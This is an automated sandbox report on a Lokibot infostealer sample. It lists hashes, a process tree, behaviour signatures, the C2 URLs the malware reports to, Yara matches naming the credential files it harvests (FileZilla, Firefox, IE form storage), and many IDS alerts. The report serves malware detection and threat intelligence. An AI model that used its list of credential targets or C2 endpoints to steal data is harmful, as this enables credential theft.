Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dhGoVvfmul

Overview

General Information

Sample Name:dhGoVvfmul (renamed file extension from none to exe)
Analysis ID:620372
MD5:5c5d4e3e0dadff03da7b9878acf3e706
SHA1:38a387d18c147245078db39a82f8531816c9d726
SHA256:bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596
Tags:32exetrojan
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • dhGoVvfmul.exe (PID: 2732 cmdline: "C:\Users\user\Desktop\dhGoVvfmul.exe" MD5: 5C5D4E3E0DADFF03DA7B9878ACF3E706)
    • dehbibhar.exe (PID: 4816 cmdline: C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl MD5: 99DF91CF3E9775BE40FE27FEFA10C203)
      • dehbibhar.exe (PID: 5828 cmdline: C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl MD5: 99DF91CF3E9775BE40FE27FEFA10C203)
  • cleanup
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
SourceRuleDescriptionAuthorStrings
00000002.00000002.519895999.0000000000607000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
          00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
          • 0x17936:$f1: FileZilla\recentservers.xml
          • 0x17976:$f2: FileZilla\sitemanager.xml
          • 0x15be6:$b2: Mozilla\Firefox\Profiles
          • 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
          • 0x15afa:$s4: logins.json
          • 0x169a4:$s6: wand.dat
          • 0x15424:$a1: username_value
          • 0x15414:$a2: password_value
          • 0x15a5f:$a3: encryptedUsername
          • 0x15acc:$a3: encryptedUsername
          • 0x15a72:$a4: encryptedPassword
          • 0x15ae0:$a4: encryptedPassword
          Click to see the 37 entries
          SourceRuleDescriptionAuthorStrings
          2.0.dehbibhar.exe.400000.7.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            2.0.dehbibhar.exe.400000.7.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              2.0.dehbibhar.exe.400000.7.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                2.0.dehbibhar.exe.400000.7.raw.unpackINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
                • 0x17936:$f1: FileZilla\recentservers.xml
                • 0x17976:$f2: FileZilla\sitemanager.xml
                • 0x15be6:$b2: Mozilla\Firefox\Profiles
                • 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                • 0x15afa:$s4: logins.json
                • 0x169a4:$s6: wand.dat
                • 0x15424:$a1: username_value
                • 0x15414:$a2: password_value
                • 0x15a5f:$a3: encryptedUsername
                • 0x15acc:$a3: encryptedUsername
                • 0x15a72:$a4: encryptedPassword
                • 0x15ae0:$a4: encryptedPassword
                2.0.dehbibhar.exe.400000.7.raw.unpackLoki_1Loki Payloadkevoreilly
                • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                • 0x153fc:$a2: last_compatible_version
                Click to see the 84 entries
                No Sigma rule has matched
                Timestamp:05/04/22-17:06:31.292534 05/04/22-17:06:31.292534
                SID:2825766
                Source Port:49787
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:16.374113 05/04/22-17:06:16.374113
                SID:2025483
                Source Port:80
                Destination Port:49780
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:18.169397 05/04/22-17:06:18.169397
                SID:2825766
                Source Port:49781
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:15.237173 05/04/22-17:07:15.237173
                SID:2825766
                Source Port:49810
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:22.890812 05/04/22-17:06:22.890812
                SID:2825766
                Source Port:49784
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:26.375874 05/04/22-17:07:26.375874
                SID:2014169
                Source Port:51787
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:09.089375 05/04/22-17:06:09.089375
                SID:2014169
                Source Port:57594
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:10.670601 05/04/22-17:06:10.670601
                SID:2014169
                Source Port:60512
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:46.460576 05/04/22-17:06:46.460576
                SID:2025483
                Source Port:80
                Destination Port:49793
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:04.571093 05/04/22-17:07:04.571093
                SID:2825766
                Source Port:49801
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:05:51.935858 05/04/22-17:05:51.935858
                SID:2825766
                Source Port:49762
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:24.436443 05/04/22-17:07:24.436443
                SID:2825766
                Source Port:49814
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:32.534838 05/04/22-17:07:32.534838
                SID:2014169
                Source Port:60790
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:07:18.160224 05/04/22-17:07:18.160224
                SID:2825766
                Source Port:49812
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:03.575681 05/04/22-17:06:03.575681
                SID:2825766
                Source Port:49771
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:24.858929 05/04/22-17:07:24.858929
                SID:2025483
                Source Port:80
                Destination Port:49814
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:21.051803 05/04/22-17:07:21.051803
                SID:2025483
                Source Port:80
                Destination Port:49813
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:26.425495 05/04/22-17:07:26.425495
                SID:2825766
                Source Port:49815
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:11.460186 05/04/22-17:06:11.460186
                SID:2025483
                Source Port:80
                Destination Port:49778
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:05:46.967263 05/04/22-17:05:46.967263
                SID:2825766
                Source Port:49759
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:15.851899 05/04/22-17:06:15.851899
                SID:2014169
                Source Port:50445
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:07:34.959527 05/04/22-17:07:34.959527
                SID:2825766
                Source Port:49819
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:05:50.222185 05/04/22-17:05:50.222185
                SID:2825766
                Source Port:49761
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:36.675434 05/04/22-17:06:36.675434
                SID:2025483
                Source Port:80
                Destination Port:49790
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:15.612334 05/04/22-17:07:15.612334
                SID:2025483
                Source Port:80
                Destination Port:49810
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:18.596983 05/04/22-17:07:18.596983
                SID:2025483
                Source Port:80
                Destination Port:49812
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:36.027149 05/04/22-17:07:36.027149
                SID:2014169
                Source Port:60946
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:19.592402 05/04/22-17:06:19.592402
                SID:2825766
                Source Port:49782
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:05:58.351855 05/04/22-17:05:58.351855
                SID:2014169
                Source Port:64909
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:07:05.007163 05/04/22-17:07:05.007163
                SID:2025483
                Source Port:80
                Destination Port:49801
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:05:56.623177 05/04/22-17:05:56.623177
                SID:2825766
                Source Port:49765
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:31.742972 05/04/22-17:06:31.742972
                SID:2025483
                Source Port:80
                Destination Port:49787
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:40.198897 05/04/22-17:06:40.198897
                SID:2825766
                Source Port:49792
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:05:58.579153 05/04/22-17:05:58.579153
                SID:2825766
                Source Port:49767
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:18.109794 05/04/22-17:07:18.109794
                SID:2014169
                Source Port:61068
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:05:53.764676 05/04/22-17:05:53.764676
                SID:2014169
                Source Port:60758
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:34.682087 05/04/22-17:06:34.682087
                SID:2014169
                Source Port:53989
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:05:57.102046 05/04/22-17:05:57.102046
                SID:2025483
                Source Port:80
                Destination Port:49765
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:21.587324 05/04/22-17:06:21.587324
                SID:2025483
                Source Port:80
                Destination Port:49783
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:00.547757 05/04/22-17:07:00.547757
                SID:2025483
                Source Port:80
                Destination Port:49800
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:19.530815 05/04/22-17:06:19.530815
                SID:2014169
                Source Port:52472
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:46.019049 05/04/22-17:06:46.019049
                SID:2825766
                Source Port:49793
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:54.136918 05/04/22-17:06:54.136918
                SID:2014169
                Source Port:50778
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:13.754758 05/04/22-17:06:13.754758
                SID:2025483
                Source Port:80
                Destination Port:49779
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:05:53.814873 05/04/22-17:05:53.814873
                SID:2825766
                Source Port:49764
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:05:56.551066 05/04/22-17:05:56.551066
                SID:2014169
                Source Port:60647
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:58.254969 05/04/22-17:06:58.254969
                SID:2025483
                Source Port:80
                Destination Port:49799
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:03.517854 05/04/22-17:06:03.517854
                SID:2014169
                Source Port:54069
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:29.614717 05/04/22-17:06:29.614717
                SID:2025483
                Source Port:80
                Destination Port:49786
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:32.582866 05/04/22-17:07:32.582866
                SID:2825766
                Source Port:49818
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:29.050171 05/04/22-17:06:29.050171
                SID:2014169
                Source Port:58816
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:51.541781 05/04/22-17:06:51.541781
                SID:2025483
                Source Port:80
                Destination Port:49797
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:18.577427 05/04/22-17:06:18.577427
                SID:2025483
                Source Port:80
                Destination Port:49781
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:01.883215 05/04/22-17:06:01.883215
                SID:2025483
                Source Port:80
                Destination Port:49769
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:05:43.139332 05/04/22-17:05:43.139332
                SID:2825766
                Source Port:49758
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:20.576478 05/04/22-17:07:20.576478
                SID:2014169
                Source Port:58715
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:47.446849 05/04/22-17:06:47.446849
                SID:2014169
                Source Port:61081
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:27.621610 05/04/22-17:06:27.621610
                SID:2025483
                Source Port:80
                Destination Port:49785
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:38.277875 05/04/22-17:06:38.277875
                SID:2825766
                Source Port:49791
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:29.254760 05/04/22-17:07:29.254760
                SID:2825766
                Source Port:49816
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:08.472306 05/04/22-17:07:08.472306
                SID:2014169
                Source Port:64948
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:09.618553 05/04/22-17:06:09.618553
                SID:2025483
                Source Port:80
                Destination Port:49777
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:06.183458 05/04/22-17:07:06.183458
                SID:2825766
                Source Port:49802
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:23.295314 05/04/22-17:06:23.295314
                SID:2025483
                Source Port:80
                Destination Port:49784
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:05:52.472200 05/04/22-17:05:52.472200
                SID:2025483
                Source Port:80
                Destination Port:49762
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:06.131413 05/04/22-17:07:06.131413
                SID:2014169
                Source Port:55142
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:07:12.890174 05/04/22-17:07:12.890174
                SID:2025483
                Source Port:80
                Destination Port:49809
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:36.607784 05/04/22-17:07:36.607784
                SID:2025483
                Source Port:80
                Destination Port:49820
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:13.256202 05/04/22-17:06:13.256202
                SID:2014169
                Source Port:61361
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:36.219078 05/04/22-17:06:36.219078
                SID:2014169
                Source Port:63431
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:07:34.907867 05/04/22-17:07:34.907867
                SID:2014169
                Source Port:62708
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:34.736743 05/04/22-17:06:34.736743
                SID:2825766
                Source Port:49789
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:26.831839 05/04/22-17:07:26.831839
                SID:2025483
                Source Port:80
                Destination Port:49815
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:20.640279 05/04/22-17:07:20.640279
                SID:2825766
                Source Port:49813
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:27.214704 05/04/22-17:06:27.214704
                SID:2014169
                Source Port:60612
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:38.226151 05/04/22-17:06:38.226151
                SID:2014169
                Source Port:56901
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:07:33.087141 05/04/22-17:07:33.087141
                SID:2025483
                Source Port:80
                Destination Port:49818
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:05:59.063198 05/04/22-17:05:59.063198
                SID:2025483
                Source Port:80
                Destination Port:49767
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:20.073584 05/04/22-17:06:20.073584
                SID:2025483
                Source Port:80
                Destination Port:49782
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:54.199564 05/04/22-17:06:54.199564
                SID:2825766
                Source Port:49798
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:29.679426 05/04/22-17:07:29.679426
                SID:2025483
                Source Port:80
                Destination Port:49816
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:12.448957 05/04/22-17:07:12.448957
                SID:2825766
                Source Port:49809
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:00.180937 05/04/22-17:07:00.180937
                SID:2825766
                Source Port:49800
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:00.131351 05/04/22-17:07:00.131351
                SID:2014169
                Source Port:61497
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:13.307202 05/04/22-17:06:13.307202
                SID:2825766
                Source Port:49779
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:05:50.113938 05/04/22-17:05:50.113938
                SID:2014169
                Source Port:64277
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:07:04.517653 05/04/22-17:07:04.517653
                SID:2014169
                Source Port:57890
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:32.814891 05/04/22-17:06:32.814891
                SID:2014169
                Source Port:64825
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:07:12.396863 05/04/22-17:07:12.396863
                SID:2014169
                Source Port:60418
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:47.985481 05/04/22-17:06:47.985481
                SID:2025483
                Source Port:80
                Destination Port:49794
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:11.039758 05/04/22-17:06:11.039758
                SID:2825766
                Source Port:49778
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:31.242187 05/04/22-17:06:31.242187
                SID:2014169
                Source Port:56437
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:07:06.643095 05/04/22-17:07:06.643095
                SID:2025483
                Source Port:80
                Destination Port:49802
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:27.338928 05/04/22-17:06:27.338928
                SID:2825766
                Source Port:49785
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:05:50.684991 05/04/22-17:05:50.684991
                SID:2025483
                Source Port:80
                Destination Port:49761
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:33.611126 05/04/22-17:06:33.611126
                SID:2025483
                Source Port:80
                Destination Port:49788
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:21.093407 05/04/22-17:06:21.093407
                SID:2014169
                Source Port:62354
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:40.145922 05/04/22-17:06:40.145922
                SID:2014169
                Source Port:50800
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:09.141152 05/04/22-17:06:09.141152
                SID:2825766
                Source Port:49777
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:36.164319 05/04/22-17:07:36.164319
                SID:2825766
                Source Port:49820
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:08.526354 05/04/22-17:07:08.526354
                SID:2825766
                Source Port:49808
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:24.388512 05/04/22-17:07:24.388512
                SID:2014169
                Source Port:57816
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:01.382015 05/04/22-17:06:01.382015
                SID:2014169
                Source Port:56509
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:05:54.312280 05/04/22-17:05:54.312280
                SID:2025483
                Source Port:80
                Destination Port:49764
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:15.931925 05/04/22-17:06:15.931925
                SID:2825766
                Source Port:49780
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:15.184930 05/04/22-17:07:15.184930
                SID:2014169
                Source Port:64259
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:57.664119 05/04/22-17:06:57.664119
                SID:2014169
                Source Port:61486
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:33.132721 05/04/22-17:06:33.132721
                SID:2825766
                Source Port:49788
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:29.203285 05/04/22-17:07:29.203285
                SID:2014169
                Source Port:53916
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:57.725161 05/04/22-17:06:57.725161
                SID:2825766
                Source Port:49799
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:05:42.799347 05/04/22-17:05:42.799347
                SID:2014169
                Source Port:54800
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:54.742448 05/04/22-17:06:54.742448
                SID:2025483
                Source Port:80
                Destination Port:49798
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:21.151210 05/04/22-17:06:21.151210
                SID:2825766
                Source Port:49783
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:51.121383 05/04/22-17:06:51.121383
                SID:2825766
                Source Port:49797
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:36.270568 05/04/22-17:06:36.270568
                SID:2825766
                Source Port:49790
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:35.234500 05/04/22-17:06:35.234500
                SID:2025483
                Source Port:80
                Destination Port:49789
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:47.499153 05/04/22-17:06:47.499153
                SID:2825766
                Source Port:49794
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:05:55.553795 05/04/22-17:05:55.553795
                SID:2014169
                Source Port:60647
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:01.435904 05/04/22-17:06:01.435904
                SID:2825766
                Source Port:49769
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:29.101313 05/04/22-17:06:29.101313
                SID:2825766
                Source Port:49786
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:18.108508 05/04/22-17:06:18.108508
                SID:2014169
                Source Port:51679
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:07:35.421031 05/04/22-17:07:35.421031
                SID:2025483
                Source Port:80
                Destination Port:49819
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:05:51.787319 05/04/22-17:05:51.787319
                SID:2014169
                Source Port:56076
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:03.992034 05/04/22-17:06:03.992034
                SID:2025483
                Source Port:80
                Destination Port:49771
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:07:09.009329 05/04/22-17:07:09.009329
                SID:2025483
                Source Port:80
                Destination Port:49808
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:22.836617 05/04/22-17:06:22.836617
                SID:2014169
                Source Port:50061
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:38.732588 05/04/22-17:06:38.732588
                SID:2025483
                Source Port:80
                Destination Port:49791
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:40.593792 05/04/22-17:06:40.593792
                SID:2025483
                Source Port:80
                Destination Port:49792
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/22-17:06:45.966592 05/04/22-17:06:45.966592
                SID:2014169
                Source Port:52256
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:06:50.800947 05/04/22-17:06:50.800947
                SID:2014169
                Source Port:63712
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:05/04/22-17:05:46.100520 05/04/22-17:05:46.100520
                SID:2014169
                Source Port:64454
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
                Source: dhGoVvfmul.exeVirustotal: Detection: 44%Perma Link
                Source: dhGoVvfmul.exeReversingLabs: Detection: 57%
                Source: http://sempersim.su/gf3/fre.phpAvira URL Cloud: Label: malware
                Source: sempersim.suVirustotal: Detection: 20%Perma Link
                Source: http://sempersim.su/gf3/fre.phpVirustotal: Detection: 21%Perma Link
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeVirustotal: Detection: 46%Perma Link
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeReversingLabs: Detection: 24%
                Source: C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)ReversingLabs: Detection: 24%
                Source: dhGoVvfmul.exeJoe Sandbox ML: detected
